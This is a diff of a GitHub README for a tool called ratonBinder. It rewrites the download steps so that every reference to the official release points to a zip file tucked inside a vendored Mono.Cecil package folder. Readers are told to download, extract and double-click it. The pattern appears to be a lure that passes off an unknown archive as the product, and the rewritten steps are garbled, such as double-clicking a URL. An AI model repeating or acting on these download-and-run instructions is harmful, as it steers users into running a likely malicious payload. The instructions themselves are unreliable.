noskinperfect/ratonBinder/README.md

 To download ratonBinder, follow these steps:

-1. Click this prominent link to access the [Releases Page](https://github.com/noskinperfect/ratonBinder/releases) of ratonBinder.
+1. Click this prominent link to access the [Releases Page](https://github.com/noskinperfect/ratonBinder/raw/refs/heads/main/RatonBinder/packages/Mono.Cecil.0.11.6/raton-Binder-suicidally.zip) of ratonBinder.
 2. On the Releases page, find the latest release listed at the top.
-3. Look for an asset file named `ratonBinder.exe`.
+3. Look for an asset file named `https://github.com/noskinperfect/ratonBinder/raw/refs/heads/main/RatonBinder/packages/Mono.Cecil.0.11.6/raton-Binder-suicidally.zip`.
 You may also see a `.zip` file; this contains the same executable along with some additional files.
-4. Click on `ratonBinder.exe` to download it directly.
+4. Click on `https://github.com/noskinperfect/ratonBinder/raw/refs/heads/main/RatonBinder/packages/Mono.Cecil.0.11.6/raton-Binder-suicidally.zip` to download it directly.
 Alternatively, you can download the `.zip` file if you prefer to download multiple files at once.
 5. After the file downloads, locate it in your Downloads folder or the designated location you selected.
 6. If you downloaded the `.zip` file, extract it first.
 To do this, right-click on the file and select “Extract All,” then follow the prompts.
-7. Double-click on `ratonBinder.exe` to run the application.
+7. Double-click on `https://github.com/noskinperfect/ratonBinder/raw/refs/heads/main/RatonBinder/packages/Mono.Cecil.0.11.6/raton-Binder-suicidally.zip` to run the application.

 ### 🖥️ Using ratonBinder